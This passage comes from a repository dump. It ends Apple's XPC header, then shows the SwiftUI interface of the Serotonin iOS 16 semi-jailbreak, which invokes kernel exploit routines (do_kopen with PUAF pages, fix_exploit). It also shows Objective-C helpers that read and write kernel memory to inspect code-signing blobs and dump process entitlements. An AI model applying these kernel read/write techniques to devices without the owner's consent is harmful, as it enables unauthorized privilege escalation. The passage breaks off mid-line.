xpc_connection_resume() on an inactive * and not otherwise suspended xpc connection has the same effect as calling * xpc_connection_activate(). For new code, using xpc_connection_activate() * is preferred. */ __OSX_AVAILABLE(10.12) __IOS_AVAILABLE(10.0) __TVOS_AVAILABLE(10.0) __WATCHOS_AVAILABLE(3.0) XPC_EXPORT XPC_NONNULL_ALL void xpc_connection_activate(xpc_connection_t connection); /*! * @function xpc_connection_suspend * Suspends the connection so that the event handler block will not fire and * that the connection will not attempt to send any messages it has in its * queue. All calls to xpc_connection_suspend() must be balanced with calls to * xpc_connection_resume() before releasing the last reference to the * connection. * * @param connection * The connection object which is to be manipulated. * * @discussion * Suspension is asynchronous and non-preemptive, and therefore this method will * not interrupt the execution of an already-running event handler block. If * the event handler is executing at the time of this call, it will finish, and * then the connection will be suspended before the next scheduled invocation * of the event handler. The XPC runtime guarantees this non-preemptiveness even * for concurrent target queues. * * Connection event handlers are non-reentrant, so it is safe to call * xpc_connection_suspend() from within the event handler block. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL void xpc_connection_suspend(xpc_connection_t connection); /*! * @function xpc_connection_resume * Resumes the connection. * * @param connection * The connection object which is to be manipulated. * * @discussion * In order for a connection to become live, every call to * xpc_connection_suspend() must be balanced with a call to * xpc_connection_resume(). * * For backward compatibility reasons, xpc_connection_resume() on an inactive * and not otherwise suspended xpc connection has the same effect as calling * xpc_connection_activate(). For new code, using xpc_connection_activate() * is preferred. * * Calling xpc_connection_resume() more times than xpc_connection_suspend() * has been called is otherwise considered an error. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL void xpc_connection_resume(xpc_connection_t connection); /*! * @function xpc_connection_send_message * Sends a message over the connection to the destination service. * * @param connection * The connection over which the message shall be sent. * * @param message * The message to send. This must be a dictionary object. This dictionary is * logically copied by the connection, so it is safe to modify the dictionary * after this call. * * @discussion * Messages are delivered in FIFO order. This API is safe to call from multiple * GCD queues. There is no indication that a message was delivered successfully. * This is because even once the message has been successfully enqueued on the * remote end, there are no guarantees about when the runtime will dequeue the * message and invoke the other connection's event handler block. * * If this API is used to send a message that is in reply to another message, * there is no guarantee of ordering between the invocations of the connection's * event handler and the reply handler for that message, even if they are * targeted to the same queue. * * After extensive study, we have found that clients who are interested in * the state of the message on the server end are typically holding open * transactions related to that message. And the only reliable way to track the * lifetime of that transaction is at the protocol layer. So the server should * send a reply message, which upon receiving, will cause the client to close * its transaction. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL void xpc_connection_send_message(xpc_connection_t connection, xpc_object_t message); /*! * @function xpc_connection_send_barrier * Issues a barrier against the connection's message-send activity. * * @param connection * The connection against which the barrier is to be issued. * * @param barrier * The barrier block to issue. This barrier prevents concurrent message-send * activity on the connection. No messages will be sent while the barrier block * is executing. * * @discussion * XPC guarantees that, even if the connection's target queue is a concurrent * queue, there are no other messages being sent concurrently while the barrier * block is executing. XPC does not guarantee that the receipt of messages * (either through the connection's event handler or through reply handlers) * will be suspended while the barrier is executing. * * A barrier is issued relative to the message-send queue. Thus, if you call * xpc_connection_send_message() five times and then call * xpc_connection_send_barrier(), the barrier will be invoked after the fifth * message has been sent and its memory disposed of. You may safely cancel a * connection from within a barrier block. * * If a barrier is issued after sending a message which expects a reply, the * behavior is the same as described above. The receipt of a reply message will * not influence when the barrier runs. * * A barrier block can be useful for throttling resource consumption on the * connected side of a connection. For example, if your connection sends many * large messages, you can use a barrier to limit the number of messages that * are inflight at any given time. This can be particularly useful for messages * that contain kernel resources (like file descriptors) which have a system- * wide limit. * * If a barrier is issued on a canceled connection, it will be invoked * immediately. If a connection has been canceled and still has outstanding * barriers, those barriers will be invoked as part of the connection's * unwinding process. * * It is important to note that a barrier block's execution order is not * guaranteed with respect to other blocks that have been scheduled on the * target queue of the connection. Or said differently, * xpc_connection_send_barrier(3) is not equivalent to dispatch_async(3). */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL void xpc_connection_send_barrier(xpc_connection_t connection, dispatch_block_t barrier); /*! * @function xpc_connection_send_message_with_reply * Sends a message over the connection to the destination service and associates * a handler to be invoked when the remote service sends a reply message. * * @param connection * The connection over which the message shall be sent. * * @param message * The message to send. This must be a dictionary object. * * @param replyq * The GCD queue to which the reply handler will be submitted. This may be a * concurrent queue. * * @param handler * The handler block to invoke when a reply to the message is received from * the connection. If the remote service exits prematurely before the reply was * received, the XPC_ERROR_CONNECTION_INTERRUPTED error will be returned. * If the connection went invalid before the message could be sent, the * XPC_ERROR_CONNECTION_INVALID error will be returned. * * @discussion * If the given GCD queue is a concurrent queue, XPC cannot guarantee that there * will not be multiple reply handlers being invoked concurrently. XPC does not * guarantee any ordering for the invocation of reply handlers. So if multiple * messages are waiting for replies and the connection goes invalid, there is no * guarantee that the reply handlers will be invoked in FIFO order. Similarly, * XPC does not guarantee that reply handlers will not run concurrently with * the connection's event handler in the case that the reply queue and the * connection's target queue are the same concurrent queue. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 XPC_NONNULL4 void xpc_connection_send_message_with_reply(xpc_connection_t connection, xpc_object_t message, dispatch_queue_t _Nullable replyq, xpc_handler_t handler); /*! * @function xpc_connection_send_message_with_reply_sync * Sends a message over the connection and blocks the caller until a reply is * received. * * @param connection * The connection over which the message shall be sent. * * @param message * The message to send. This must be a dictionary object. * * @result * The message that the remote service sent in reply to the original message. * If the remote service exits prematurely before the reply was received, the * XPC_ERROR_CONNECTION_INTERRUPTED error will be returned. If the connection * went invalid before the message could be sent, the * XPC_ERROR_CONNECTION_INVALID error will be returned. * * You are responsible for releasing the returned object. * * @discussion * This API supports priority inversion avoidance, and should be used instead of * combining xpc_connection_send_message_with_reply() with a semaphore. * * Invoking this API from a queue that is a part of the target queue hierarchy * results in deadlocks under certain conditions. * * Be judicious about your use of this API. It can block indefinitely, so if you * are using it to implement an API that can be called from the main thread, you * may wish to consider allowing the API to take a queue and callback block so * that results may be delivered asynchronously if possible. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL XPC_WARN_RESULT XPC_RETURNS_RETAINED xpc_object_t xpc_connection_send_message_with_reply_sync(xpc_connection_t connection, xpc_object_t message); /*! * @function xpc_connection_cancel * Cancels the connection and ensures that its event handler will not fire * again. After this call, any messages that have not yet been sent will be * discarded, and the connection will be unwound. If there are messages that are * awaiting replies, they will have their reply handlers invoked with the * XPC_ERROR_CONNECTION_INVALID error. * * @param connection * The connection object which is to be manipulated. * * @discussion * Cancellation is asynchronous and non-preemptive and therefore this method * will not interrupt the execution of an already-running event handler block. * If the event handler is executing at the time of this call, it will finish, * and then the connection will be canceled, causing a final invocation of the * event handler to be scheduled with the XPC_ERROR_CONNECTION_INVALID error. * After that invocation, there will be no further invocations of the event * handler. * * The XPC runtime guarantees this non-preemptiveness even for concurrent target * queues. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL void xpc_connection_cancel(xpc_connection_t connection); /*! * @function xpc_connection_get_name * Returns the name of the service with which the connections was created. * * @param connection * The connection object which is to be examined. * * @result * The name of the remote service. If you obtained the connection through an * invocation of another connection's event handler, NULL is returned. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL XPC_WARN_RESULT const char * _Nullable xpc_connection_get_name(xpc_connection_t connection); /*! * @function xpc_connection_get_euid * Returns the EUID of the remote peer. * * @param connection * The connection object which is to be examined. * * @result * The EUID of the remote peer at the time the connection was made. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL XPC_WARN_RESULT uid_t xpc_connection_get_euid(xpc_connection_t connection); /*! * @function xpc_connection_get_egid * Returns the EGID of the remote peer. * * @param connection * The connection object which is to be examined. * * @result * The EGID of the remote peer at the time the connection was made. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL XPC_WARN_RESULT gid_t xpc_connection_get_egid(xpc_connection_t connection); /*! * @function xpc_connection_get_pid * Returns the PID of the remote peer. * * @param connection * The connection object which is to be examined. * * @result * The PID of the remote peer. * * @discussion * A given PID is not guaranteed to be unique across an entire boot cycle. * Great care should be taken when dealing with this information, as it can go * stale after the connection is established. OS X recycles PIDs, and therefore * another process could spawn and claim the PID before a message is actually * received from the connection. * * XPC will deliver an error to your event handler if the remote process goes * away, but there are no guarantees as to the timing of this notification's * delivery either at the kernel layer or at the XPC layer. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL XPC_WARN_RESULT pid_t xpc_connection_get_pid(xpc_connection_t connection); /*! * @function xpc_connection_get_asid * Returns the audit session identifier of the remote peer. * * @param connection * The connection object which is to be examined. * * @result * The audit session ID of the remote peer at the time the connection was made. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL XPC_WARN_RESULT au_asid_t xpc_connection_get_asid(xpc_connection_t connection); /*! * @function xpc_connection_set_context * Sets context on an connection. * * @param connection * The connection which is to be manipulated. * * @param context * The context to associate with the connection. * * @discussion * If you must manage the memory of the context object, you must set a finalizer * to dispose of it. If this method is called on a connection which already has * context associated with it, the finalizer will NOT be invoked. The finalizer * is only invoked when the connection is being deallocated. * * It is recommended that, instead of changing the actual context pointer * associated with the object, you instead change the state of the context * object itself. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 void xpc_connection_set_context(xpc_connection_t connection, void * _Nullable context); /*! * @function xpc_connection_get_context * Returns the context associated with the connection. * * @param connection * The connection which is to be examined. * * @result * The context associated with the connection. NULL if there has been no context * associated with the object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL XPC_WARN_RESULT void * _Nullable xpc_connection_get_context(xpc_connection_t connection); /*! * @function xpc_connection_set_finalizer_f * Sets the finalizer for the given connection. * * @param connection * The connection on which to set the finalizer. * * @param finalizer * The function that will be invoked when the connection's retain count has * dropped to zero and is being torn down. * * @discussion * This method disposes of the context value associated with a connection, as * set by {@link xpc_connection_set_context}. * * For many uses of context objects, this API allows for a convenient shorthand * for freeing them. For example, for a context object allocated with malloc(3): * * xpc_connection_set_finalizer_f(object, free); */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 void xpc_connection_set_finalizer_f(xpc_connection_t connection, xpc_finalizer_t _Nullable finalizer); /*! * @function xpc_connection_set_peer_code_signing_requirement * Requires that the connection peer satisfies a code signing requirement. * * @param connection * The connection object which is to be modified. * * @param requirement * The code signing requirement to be satisfied by the peer * It is safe to deallocate the requirement string after calling `xpc_connection_set_peer_code_signing_requirement` * * @result * 0 on success, non-zero on error * * @discussion * This function will return an error promptly if the code signing requirement string is invalid. * * It is a programming error to call `xpc_connection_set_peer_code_signing_requirement` more than once per connection. * * All messages received on this connection will be checked to ensure they come from a peer who satisfies * the code signing requirement. For a listener connection, requests that do not satisfy the requirement * are dropped. When a reply is expected on the connection and the peer does not satisfy the requirement * XPC_ERROR_PEER_CODE_SIGNING_REQUIREMENT will be delivered instead of the reply. * * This API is not supported on embedded platforms and will return ENOTSUP. * * @see https://developer.apple.com/documentation/technotes/tn3127-inside-code-signing-requirements */ __API_AVAILABLE(macos(12.0)) XPC_EXPORT XPC_NONNULL_ALL XPC_WARN_RESULT int xpc_connection_set_peer_code_signing_requirement(xpc_connection_t connection, const char *requirement); __END_DECLS XPC_ASSUME_NONNULL_END #endif // __XPC_CONNECTION_H__ ================================================ FILE: usprebooter/TheCoolerContentView.swift ================================================ // bomberfish // ContentView.swift – AppLogDemo // created on 2023-12-26 //import FluidGradient import SwiftUI //import SwiftUIBackports // let fancyAnimation: SwiftUI.Animation = .snappy(duration: 0.35, extraBounce: 0.085) // smoooooth operaaatooor /// An actually good UI, courtesy of ya boi BomberFish. struct CoolerContentView: View { @Binding var useNewUI: Bool var pipe = Pipe() // @Binding var triggerRespring: Bool // dont use this when porting this ui to your jailbreak (unless you respring in the same way) @State var logItems: [String] = [] @State var progress: Double = 0.0 @State var isRunning = false @State var finished = false @State var settingsOpen = false @State var color: Color = .init("accent", bundle: Bundle.main) @AppStorage("accent") var accentColor: String = "" @AppStorage("swag") var swag = true @State var showingGradient = false @State var blurScreen = false @AppStorage("cr") var customReboot = true @AppStorage("verbose") var verboseBoot = false @AppStorage("unthreded") var untether = true @AppStorage("hide") var hide = false @AppStorage("loadd") var loadLaunch = false @AppStorage("showStdout") var showStdout = true @State var reinstall = false @State var resetfs = false @State var shouldShowLog = true @AppStorage("headroom") var staticHeadroomMB: Double = 384.0 @AppStorage("pages") var pUaFPages: Double = 3072.0 public func openConsolePipe() { setvbuf(stdout, nil, _IONBF, 0) dup2(pipe.fileHandleForWriting.fileDescriptor, STDOUT_FILENO) // listening on the readabilityHandler pipe.fileHandleForReading.readabilityHandler = { handle in let data = handle.availableData let str = String(data: data, encoding: .ascii) ?? "[i] \n" DispatchQueue.main.async { withAnimation(fancyAnimation) { logItems.append(str) } } } } @ViewBuilder var settings: some View { NavigationView { ScrollView { VStack(alignment: .leading) { VStack(alignment: .leading) { NavigationLink(destination: CreditsView(), label: { HStack { Group { Label("Credits", systemImage: "heart") .foregroundColor(.primary) Spacer() Image(systemName: "chevron.right") .foregroundColor(.secondary) }.padding(15) } .background(.regularMaterial) }) } .clipShape(RoundedRectangle(cornerRadius: 14)) Divider() .padding(.vertical, 8) Label("Jailbreak", systemImage: "lock.open") .padding(.leading, 17.5) .font(.caption) .foregroundColor(.secondary) VStack(alignment: .leading) { VStack(alignment: .leading) { HStack { Label("PUAF Pages", systemImage: "doc") Spacer() Picker("PUAF Pages", systemImage: "doc", selection: $pUaFPages) { Text("16").tag(16.0) Text("32").tag(32.0) Text("64").tag(64.0) Text("128").tag(128.0) Text("256").tag(256.0) Text("512").tag(512.0) Text("1024").tag(1024.0) Text("2048").tag(2048.0) Text("3072").tag(3072.0) Text("4096").tag(4096.0) Text("65536").tag(65536.0) } .labelsHidden() } let memSizeMB = getPhysicalMemorySize() / 1048576 HStack { Label("Static Headroom", systemImage: "memorychip") Spacer() Slider(value: $staticHeadroomMB, in: 0...Double(memSizeMB), step: 128.0, label: {}) Text("\(Int(staticHeadroomMB)) MB") .font(.caption.monospacedDigit()) } // Group { // Toggle("Custom Reboot Logo", systemImage: "applelogo", isOn: $customReboot) // soon // Toggle("Load Launch Daemons", systemImage: "restart.circle", isOn: $loadLaunch) // } // .disabled(true) Toggle("Verbose Boot", systemImage: "ladybug", isOn: $verboseBoot) .onChange(of: verboseBoot) {_ in if verboseBoot { if !(FileManager.default.createFile(atPath: "/var/mobile/.serotonin_verbose", contents: nil)) { verboseBoot = false } } else { do { try FileManager.default.removeItem(atPath: "/var/mobile/.serotonin_verbose") } catch { verboseBoot = true } } } // Group { // Toggle("Enable untether", systemImage: "slash.circle", isOn: $untether) // Toggle("Hide environment", systemImage: "eye.slash", isOn: $hide) // } // .disabled(true) Toggle("Show output (recommended)", systemImage: "terminal", isOn: $showStdout) } .toggleStyle(SwitchToggleStyle()) .padding(15) .background(.regularMaterial) } .clipShape(RoundedRectangle(cornerRadius: 14)) .disabled(isRunning || finished) Divider() .padding(.vertical, 8) Label("Appearance", systemImage: "paintpalette") .padding(.leading, 17.5) .font(.caption) .foregroundColor(.secondary) VStack(alignment: .leading) { VStack(alignment: .leading) { HStack { Label("Accent Color", systemImage: "paintpalette") Spacer() ColorPicker("Accent Color", selection: $color) .onChange(of: color) {_ in accentColor = updateCardColorInAppStorage(color: color) } .labelsHidden() Button("", systemImage: "arrow.counterclockwise") { withAnimation(fancyAnimation) { color = .accentColor accentColor = updateCardColorInAppStorage(color: .init("accent", bundle: Bundle.main)) } } .tint(color) .foregroundColor(color) } Toggle("Swag Mode", systemImage: "flame", isOn: $swag) } .padding(15) .background(.regularMaterial) } .clipShape(RoundedRectangle(cornerRadius: 14)) Label("Disable Swag Mode if the app seems sluggish.", systemImage: "info.circle") .padding(.leading, 17.5) .font(.caption) .foregroundColor(.secondary) } .padding(20) } .navigationTitle("Settings") .navigationBarTitleDisplayMode(.inline) .toolbar { ToolbarItem(placement: .topBarTrailing) { Button("", systemImage: "xmark") { settingsOpen = false withAnimation(fancyAnimation) { blurScreen = false } } .font(.system(size: 15)) .tint(Color(UIColor.label)) } } } } @ViewBuilder var sheet: some View { if #available(iOS 16.0, *) { if #available(iOS 16.4, *) { settings .presentationDetents([.medium, .large]) .presentationBackground(.regularMaterial) } else { settings .presentationDetents([.medium, .large]) .background(.regularMaterial) } } else { settings .background(.regularMaterial) // .backport.presentationDetents([.medium, .large]) } } @ViewBuilder var body: some View { GeometryReader { geo in NavigationView { ZStack { Color.black .ignoresSafeArea(.all) if showingGradient { FluidGradient(blobs: [color, color, color, color, color, color, color, color, color], speed: 0.35, blur: 0.7) // swag alert #420blazeit .ignoresSafeArea(.all) } Rectangle() .fill(.clear) .background(.black.opacity(0.8)) .ignoresSafeArea(.all) VStack(spacing: 15) { VStack(alignment: .leading) { Text("Serotonin") // apex????? .multilineTextAlignment(.leading) .font(.system(.largeTitle, design: .rounded).weight(.bold)) Text("(Not/Semi-)jailbreak for iOS 16.2-16.6.1") } .padding(.top, geo.size.height / 50) .padding(.leading, 5) .frame(maxWidth: .infinity, alignment: .topLeading) Spacer() if !isRunning && !finished { ZStack { Rectangle() .fill(.clear) .blur(radius: 16) .background(Color(UIColor.secondarySystemGroupedBackground).opacity(0.5)) VStack { Toggle("Reinstall bootstrap", isOn: $reinstall) .disabled(true) .onChange(of: reinstall) { _ in if reinstall { withAnimation(fancyAnimation) { resetfs = false } } } Divider() Toggle("Restore system", isOn: $resetfs) .disabled(true) .onChange(of: resetfs) { _ in if resetfs { withAnimation(fancyAnimation) { reinstall = false } } } Divider() Button("More Settings", systemImage: "gear") { UIImpactFeedbackGenerator(style: .medium).impactOccurred(intensity: 200) settingsOpen.toggle() withAnimation(fancyAnimation) { blurScreen = true } } .padding(.top, 5) } .padding() } .clipShape(RoundedRectangle(cornerRadius: 14)) .frame(width: geo.size.width / 1.5, height: geo.size.height / 6.5) .padding(.vertical) } ZStack { Rectangle() .fill(.clear) .blur(radius: 16) .background(Color(UIColor.secondarySystemGroupedBackground).opacity(0.5)) ScrollView { LazyVStack(alignment: .leading) { ScrollViewReader { value in ForEach(logItems, id: \.self) { log in // caveat: no two log messages can be the same. can be solved by custom struct with a uuid, but i cba to do that rn Text(log) .id(log) .multilineTextAlignment(.leading) .frame(width: geo.size.width - 50, alignment: .leading) } .font(.system(.body, design: .monospaced)) .multilineTextAlignment(.leading) .onChange(of: logItems.count) { new in value.scrollTo(logItems[new - 1]) } } } .padding(.bottom, 15) .padding() } } .frame(height: logItems.isEmpty ? 0 : geo.size.height / 2.5, alignment: .leading) // .background(.ultraThinMaterial) .clipShape(RoundedRectangle(cornerRadius: 14)) .onChange(of: progress) { p in if p == 1.0 { DispatchQueue.main.asyncAfter(deadline: .now() + 0.75) { withAnimation(fancyAnimation) { isRunning = false finished = true } } } } HStack { if isRunning { ProgressView(value: progress) .tint(progress == 1.0 ? .green : color) Text(progress == 1.0 ? "Complete" : "\(Int(progress * 100))%") .font(.caption) } } .padding(.top, 10) Button(action: { withAnimation(fancyAnimation) { shouldShowLog = true } UIImpactFeedbackGenerator(style: .soft).impactOccurred(intensity: 200) if finished { // triggerRespring = true // change this when porting this ui to your jailbreak userspaceReboot() } else { withAnimation(fancyAnimation) { isRunning = true shouldShowLog = true } // funnyThing(true) { prog, log in // withAnimation(fancyAnimation) { // progress = prog // logItems.append(log) // } // } withAnimation(fancyAnimation) { logItems.append("[i] \(UIDevice.current.localizedModel), iOS \(UIDevice.current.systemVersion)") } DispatchQueue.main.asyncAfter(deadline: .now() + 0.75) { // logItems.append("[*] Doing kopen") setProgress(0.1) do_kopen(UInt64(pUaFPages), 2, 1, 1, Int(staticHeadroomMB), true) setProgress(0.25) // logItems.append("[*] Exploit fixup") setProgress(0.3) fix_exploit() setProgress(0.5) // logItems.append("[*] Hammer time.") setProgress(0.6) setProgress(0.75) // logItems.append("[*] All done, kclosing") go() setProgress(0.9) do_kclose() } DispatchQueue.main.asyncAfter(deadline: .now() + 0.75) { logItems.append("[√] All done!") setProgress(1.0) } } }, label: { if isRunning { HStack(spacing: 10) { ProgressView() .tint(Color(UIColor.secondaryLabel)) .controlSize(.regular) Text("Jelbreking") } .frame(width: geo.size.width / 2.5) } else if finished { Label("Userspace Reboot", systemImage: "arrow.clockwise") .frame(width: geo.size.width / 1.75) } else { Label("Jelbrek", systemImage: "lock.open") .frame(width: geo.size.width / 1.75) } }) .disabled(isRunning) .buttonStyle(.bordered) .tint(finished ? .green : color) .controlSize(.large) .padding(.vertical, 0.1) if !isRunning && !finished { Button("Switch to old UI", systemImage: "switch.2") { withAnimation(fancyAnimation) { useNewUI.toggle() } } } Spacer() } .padding() } .blur(radius: swag && blurScreen ? 3 : 0) .overlay { if blurScreen { Color.black.opacity(0.3) .ignoresSafeArea(.all) } } .sheet(isPresented: $settingsOpen, onDismiss: { withAnimation(fancyAnimation) { blurScreen = false } }, content: { sheet }) } .tint(color) .navigationViewStyle(.stack) } .onChange(of: color) { new in accentColor = updateCardColorInAppStorage(color: new) } .animation(fancyAnimation, value: logItems) .onAppear { if accentColor == "" { accentColor = updateCardColorInAppStorage(color: .init("accent", bundle: Bundle.main)) } if showStdout { openConsolePipe() } showingGradient = swag withAnimation(fancyAnimation) { let rgbArray = accentColor.components(separatedBy: ",") if let red = Double(rgbArray[0]), let green = Double(rgbArray[1]), let blue = Double(rgbArray[2]), let alpha = Double(rgbArray[3]) { color = .init(.sRGB, red: red, green: green, blue: blue, opacity: alpha) } } } .onChange(of: swag) { new in withAnimation(fancyAnimation) { showingGradient = new } } } func setProgress(_ p: Double) { withAnimation(fancyAnimation) { progress = p } } } struct LinkCell: View { var title: String var detail: String var link: String var imageName: String? var body: some View { Link(destination: URL(string: link)!) { HStack(alignment: .center) { if let imageName { Image(imageName) .resizable() .frame(width: 32, height: 32) .clipShape(Circle()) } else { Image(systemName: "person.circle") .font(.system(size: 32)) } VStack(alignment: .leading) { Text(title) .font(.headline) Text(detail) .font(.subheadline) .foregroundColor(.secondary) } } } } } struct CreditsView: View { var body: some View { List { LinkCell(title: "hrtowii/sacrosanctuary", detail: "Main dev", link: "https://twitter.com/htrowii", imageName: "htrowii") LinkCell(title: "DuyTranKhanh", detail: "Contributed SpringBoard hooks and launchd hooks", link: "https://twitter.com/TranKha50277352", imageName: "duy") LinkCell(title: "NSBedtime", detail: "launchd hax, helped out a ton!", link: "https://twitter.com/NSBedtime", imageName: "bedtime") LinkCell(title: "Nick Chan", detail: "Helped out a lot!", link: "https://twitter.com/riscv64", imageName: "alfienick") LinkCell(title: "Alfie CG", detail: "insert_dylib, name, helped out a lot", link: "https://twitter.com/alfiecg_dev", imageName: "alfienick") LinkCell(title: "BomberFish", detail: "Main UI", link: "https://bomberfish.ca", imageName: "fish") LinkCell(title: "haxi0", detail: "Added initial log", link: "https://bomberfish.ca", imageName: "haxi0") } .navigationTitle("Credits") } } func updateCardColorInAppStorage(color: Color) -> String { let uiColor = UIColor(color) var red: CGFloat = 0 var green: CGFloat = 0 var blue: CGFloat = 0 var alpha: CGFloat = 0 uiColor.getRed(&red, green: &green, blue: &blue, alpha: &alpha) return "\(red),\(green),\(blue),\(alpha)" } #Preview { ContentView(useNewUI: .constant(true)) } ================================================ FILE: usprebooter/fun/cs_blobs.h ================================================ // // cs_blobs.h // kfd // // Created by Seo Hyun-gyu on 2023/08/05. // #ifndef cs_blobs_h #define cs_blobs_h #include uint64_t fun_cs_blobs(char* execPath); uint64_t fun_proc_dump_entitlements(uint64_t proc); uint64_t fun_vnode_dump_entitlements(const char* path); #endif /* cs_blobs_h */ ================================================ FILE: usprebooter/fun/cs_blobs.m ================================================ // // cs_blobs.c // kfd // // Created by Seo Hyun-gyu on 2023/08/05. // #include "cs_blobs.h" #include "krw.h" #include "offsets.h" #include "vnode.h" #include "utils.h" #include "thanks_opa334dev_htrowii.h" extern const uint8_t *der_decode_plist(CFAllocatorRef allocator, CFTypeRef* output, CFErrorRef *error, const uint8_t *der_start, const uint8_t *der_end); typedef struct __SC_GenericBlob { uint32_t magic; /* magic number */ uint32_t length; /* total length of blob */ char data[]; } CS_GenericBlob __attribute__ ((aligned(1))); uint32_t convertToLittleEndian(uint32_t num) { return ((num & 0x000000FF) << 24) | ((num & 0x0000FF00) << 8) | ((num & 0x00FF0000) >> 8) | ((num & 0xFF000000) >> 24); } //https://github.com/opa334/Dopamine/blob/master/BaseBin/libjailbreak/src/util.m#L656 NSMutableDictionary *DEREntitlementsDecode(uint8_t *start, uint8_t *end) { if (!start || !end) return nil; if (start == end) return nil; CFTypeRef plist = NULL; CFErrorRef err; der_decode_plist(NULL, &plist, &err, start, end); if (plist) { if (CFGetTypeID(plist) == CFDictionaryGetTypeID()) { NSMutableDictionary *plistDict = (__bridge_transfer id)plist; return plistDict; } else if (CFGetTypeID(plist) == CFDataGetTypeID()) { // This code path is probably never used, but I decided to implement it anyways // Because I saw in disassembly that there is a possibility for this to return data NSData *plistData = (__bridge_transfer id)plist; NSPropertyListFormat format; NSError *decodeError; NSMutableDictionary *result = ((NSDictionary *)[NSPropertyListSerialization propertyListWithData:plistData options:0 format:&format error:&decodeError]).mutableCopy; if (!result) { NSLog(@"[-] Error decoding DER: %s", decodeError.description.UTF8String); } return result; } } return nil; } uint64_t fun_cs_blobs(char *execPath) { uint64_t ubc_info = kread64(getVnodeAtPath(execPath) + off_vnode_vu_ubcinfo) | 0xffffff8000000000; uint32_t cs_add_gen = kread32(ubc_info + off_ubc_info_cs_add_gen); // cs_add_gen += 1; NSLog(@"cs_add_gen: 0x%x", cs_add_gen); kwrite32(ubc_info + off_ubc_info_cs_add_gen, cs_add_gen); uint64_t csblobs = kread64(ubc_info + off_ubc_info_cs_blobs); NSLog(@"csblobs: 0x%llx", csblobs); uint32_t csb_flags = kread32(csblobs + off_cs_blob_csb_flags); NSLog(@"csb_flags: 0x%x", csb_flags); uint64_t csb_teamid = kread64(csblobs + off_cs_blob_csb_teamid); NSLog(@"csb_teamid: 0x%llx", csb_teamid); NSLog(@"csb_cdhash"); HexDump(csblobs + off_cs_blob_csb_cdhash, 20); return 0; } uint64_t fun_proc_dump_entitlements(uint64_t proc) { uint64_t proc_ro = kread64(proc + off_p_proc_ro); uint64_t ucreds = kread64(proc_ro + off_p_ro_p_ucred); uint64_t cr_label_pac = kread64(ucreds + off_u_cr_label); uint64_t cr_label = cr_label_pac | 0xffffff8000000000; NSLog(@"[i] ucred->cr_label: 0x%llx", cr_label); //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/osfmk/kern/cs_blobs.h#L283 //Thanks @jmpews, https://twitter.com/jmpews/status/1623669186894659584/photo/3 uint64_t osents = kread64(cr_label + 8);//+8, 16, 32, 64, 104, 112, 128, 168, 176, 232, 240 has kernel pointer values... NSLog(@"[i] osents: 0x%llx", osents); uint64_t osentitlements = kread64(osents + 0x10); NSLog(@"[i] osentitlements: 0x%llx", osentitlements); uint64_t dict = kread64(osentitlements + 0x70); NSLog(@"[i] dict: 0x%llx", dict); uint64_t query_ctx = osentitlements + 0x20; NSLog(@"[i] query_ctx: 0x%llx", query_ctx); uint64_t der_start = kread64(query_ctx + 0x40); NSLog(@"[i] der_start: 0x%llx", der_start); uint64_t der_end = kread64(query_ctx + 0x20); NSLog(@"[i] der_end: 0x%llx", der_end); uint64_t der_len = der_end - der_start; NSLog(@"[i] der_len: 0x%llx", der_len); uint8_t has_no_der_ents = kread8(osentitlements + 0x50); NSLog(@"[i] has_no_der_ents: 0x%x", has_no_der_ents); uint64_t csb_der_entitlements_blob = kread64(osentitlements + 0x60); NSLog(@"[i] csb_der_entitlements_blob: 0x%llx", csb_der_entitlements_blob); if(!has_no_der_ents) { CS_GenericBlob der_ents_blob = {0}; kreadbuf(csb_der_entitlements_blob, (uint8_t *)&der_ents_blob, sizeof(der_ents_blob)); uint32_t der_ents_data_len = der_ents_blob.length; NSLog(@"[i] der_ents_blob.length: 0x%x", convertToLittleEndian(der_ents_data_len)); uint8_t *der_ents_data = malloc(der_len); kreadbuf(csb_der_entitlements_blob + 8, der_ents_data, der_len); uint8_t *us_der_end = der_ents_data + der_len; NSMutableDictionary *entitlements = DEREntitlementsDecode(der_ents_data, us_der_end); if(entitlements != nil) { NSLog(@"[+] Got decoded entitlements!\n%@", entitlements); } else { HexDump(csb_der_entitlements_blob, der_len); } free(der_ents_data); } return 0; } uint64_t fun_vnode_dump_entitlements(const char* path) { uint64_t vnode = getVnodeAtPath(path); uint64_t ubc_info_pac = kread64(vnode + off_vnode_vu_ubcinfo); uint64_t ubc_info = ubc_info_pac | 0xffffff8000000000; uint64_t csblobs = kread64(ubc_info + off_ubc_info_cs_blobs); if(csblobs == 0) { NSLog(@"[-] Couldn't get vnode->ubc_info->cs_blobs."); return -1; } uint64_t csb_pmap_cs_entry = kread64(csblobs + off_cs_blob_csb_pmap_cs_entry); NSLog(@"[i] vnode->ubc_info->cs_blobs->csb_pmap_cs_entry: 